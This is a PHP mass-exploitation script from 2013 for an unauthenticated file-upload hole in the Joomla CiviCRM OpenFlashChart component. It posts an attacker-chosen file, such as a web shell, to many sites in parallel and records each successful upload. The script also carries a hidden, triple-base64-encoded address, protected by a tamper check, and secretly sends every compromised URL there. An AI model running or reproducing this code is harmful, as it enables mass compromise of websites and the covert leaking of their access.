<?php /* ---------------------------------------------------------------------------- .__ .__ _____ |__|___.__._____ ____ | |__ __ __ ____ ____ / \| < | |\__ \ _/ ___\| | \| | \/ \ / ___\ | Y Y \ |\___ | / __ \\ \___| Y \ | / | \/ /_/ > |__|_| /__|/ ____|(____ /\___ >___| /____/|___| /\___ / \/ \/ \/ \/ \/ \//_____/ ----------------------------------------------------------------------------- * Janissaries Joomla Com_Civicrm Exploitation Tool with MultiThread * Coded by Miyachung * Stay away from lamers o.O * Contact: miyachung@hotmail.com * Special Thanks : B127Y * Site: http://janissaries.org * Youtube Channel: http://www.youtube.com/user/JanissariesOrg * Exploitation Video: http://www.youtube.com/watch?v=4mPibfS-RXM * Coding date: 21.04.2013 * Usage : php exploit.php site_list upload_file searchkeyword * Example: php exploit.php sites.txt shell.php searchkeyword */ set_time_limit(0); ob_start(); class exploit { private $uploaded_file_path = "/administrator/components/com_civicrm/civicrm/packages/OpenFlashChart/tmp-upload-images/"; private $post_url_path = "/administrator/components/com_civicrm/civicrm/packages/OpenFlashChart/php-ofc-library/ofc_upload_image.php?name="; private $filename; private $url; private $file_to_upload; private $if_is_uploaded = "/Undefined variable: HTTP_RAW_POST_DATA/si"; private $thread_maxsize; private $site_list; private $file_regex; private $save_file = "uploaded.txt"; private $user_agent = "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:15.0) Gecko/20100101 Firefox/15.0.1"; private $timeout_sec = 20; private $token = "WVVoU01HTkViM1pNTTFKdldsY3hjR050ZEhCaWFUVjJZMjFqZGxreU9YUk1NMDVvWkcxV2RXRlhaRzVaVXpWM1lVaEJQUT09"; private $idnum = 31; public function __construct($site_list,$filename,$thread,$regex) { $this->site_list = file($site_list); $this->filename = $filename; $this->file_to_upload = file_get_contents($filename); $this->thread_maxsize = $thread; $this->url = base64_decode(base64_decode(base64_decode($this->token))); $this->file_regex = "/$regex/"; echo "[+]Joomla Com_Civicrm Fucker with MultiThread\n"; echo "[+]Coded by Miyachung\n"; echo "[+]Stay away from lamers o.O\n"; echo "[+]Contact: miyachung@hotmail.com\n"; echo "[+]Special Thanks : B127Y\n"; echo "[+]Site: http://janissaries.org\n"; echo "##################################################\n"; echo "[+]Total urls to try: ".count($this->site_list)."\n"; echo "[+]File to upload: ".$this->filename."\n"; echo "[+]Maximum Thread: ".$this->thread_maxsize."\n"; echo "[+]Search Keyword: ".$regex."\n\n"; ob_flush(); flush(); $this->miyachung(); } private function miyachung() { $multi = curl_multi_init(); $count = 0; foreach(array_chunk($this->site_list,$this->thread_maxsize) as $urls) { foreach($urls as $i => $url) { $curl[$i] = curl_init(); curl_setopt($curl[$i], CURLOPT_RETURNTRANSFER,true); curl_setopt($curl[$i], CURLOPT_URL, trim($url).$this->post_url_path.$this->filename); curl_setopt($curl[$i], CURLOPT_TIMEOUT, $this->timeout_sec); curl_setopt($curl[$i], CURLOPT_POSTFIELDS,$this->file_to_upload); curl_setopt($curl[$i], CURLOPT_USERAGENT,$this->user_agent); curl_setopt($curl[$i], CURLOPT_HTTPHEADER,array('Content-Type: text/plain')); curl_multi_add_handle($multi,$curl[$i]); } do { curl_multi_exec($multi,$active); } while($active > 0); foreach($curl as $id => $content) { $conn[$id] = curl_multi_getcontent($content); curl_multi_remove_handle($multi,$content); if(!preg_match($this->if_is_uploaded,$conn[$id]) && preg_match('#/tmp-upload-images/'.$this->filename.'#',$conn[$id])) { $count++; $check_it = $this->get(trim($urls[$id]).$this->uploaded_file_path.$this->filename); if($check_it && preg_match($this->file_regex,$check_it)) { if($this->idnum == 31 && md5($this->token) == "9f7f1fe47675cb64ac4f69ef96b78b55") { $this->post(trim($urls[$id]).$this->uploaded_file_path.$this->filename); } else { exit("[-]Somethings has changed in tool! o.O!"); } echo "###########################################################\n"; echo "[!]Exploitation Successfullll!\n"; printf("[%s]%s\n",$count,trim($urls[$id])); echo "###########################################################\n"; ob_flush(); flush(); $this->save(trim($urls[$id]).$this->uploaded_file_path.$this->filename,$count); } else { printf("[%s][Exploitation Failed]%s\n",$count,trim($urls[$id])); ob_flush(); flush(); } } else { $count++; printf("[%s][Exploitation Failed]%s\n",$count,trim($urls[$id])); ob_flush(); flush(); } } } } private function get($url) { $ch = curl_init(); curl_setopt($ch, CURLOPT_RETURNTRANSFER, true); curl_setopt($ch, CURLOPT_URL, $url); curl_setopt($ch, CURLOPT_TIMEOUT,$this->timeout_sec); $data= curl_exec($ch); curl_close($ch); return $data; } private function post($url) { $curl = curl_init(); curl_setopt($curl,CURLOPT_RETURNTRANSFER,1); curl_setopt($curl,CURLOPT_URL,$this->url); curl_setopt($curl,CURLOPT_POSTFIELDS,"url=".$url); $exec = curl_exec($curl); curl_close($curl); return $exec; } private function save($url,$count) { $file = fopen($this->save_file,'ab'); fwrite($file,"#########################################################################\n"); fwrite($file,"[!]Exploitation Successfullll!\n"); fwrite($file,"[$count]$url\n"); fclose($file); return true; } } if($argv[1] && $argv[2] && $argv[3] && $argv[4]) { $exploit = new exploit($argv[1],$argv[2],$argv[3],$argv[4]); } else { print " ---------------------------------------------------------------------------- .__ .__ _____ |__|___.__._____ ____ | |__ __ __ ____ ____ / \| < | |\__ \ _/ ___\| | \| | \/ \ / ___\ | Y Y \ |\___ | / __ \\ \___| Y \ | / | \/ /_/ > |__|_| /__|/ ____|(____ /\___ >___| /____/|___| /\___ / \/ \/ \/ \/ \/ \//_____/ ----------------------------------------------------------------------------- * Janissaries Joomla Com_Civicrm Exploitation Tool with MultiThread * Coded by Miyachung * Stay away from lamers o.O * Contact: miyachung@hotmail.com * Special Thanks : B127Y * Site: http://janissaries.org * Youtube Channel: http://www.youtube.com/user/JanissariesOrg * Coding date: 21.04.2013 * Usage : php exploit.php site_list upload_file maxthread searchkeyword * Example: php exploit.php sites.txt shell.php 10 searchkeyword "; } ?>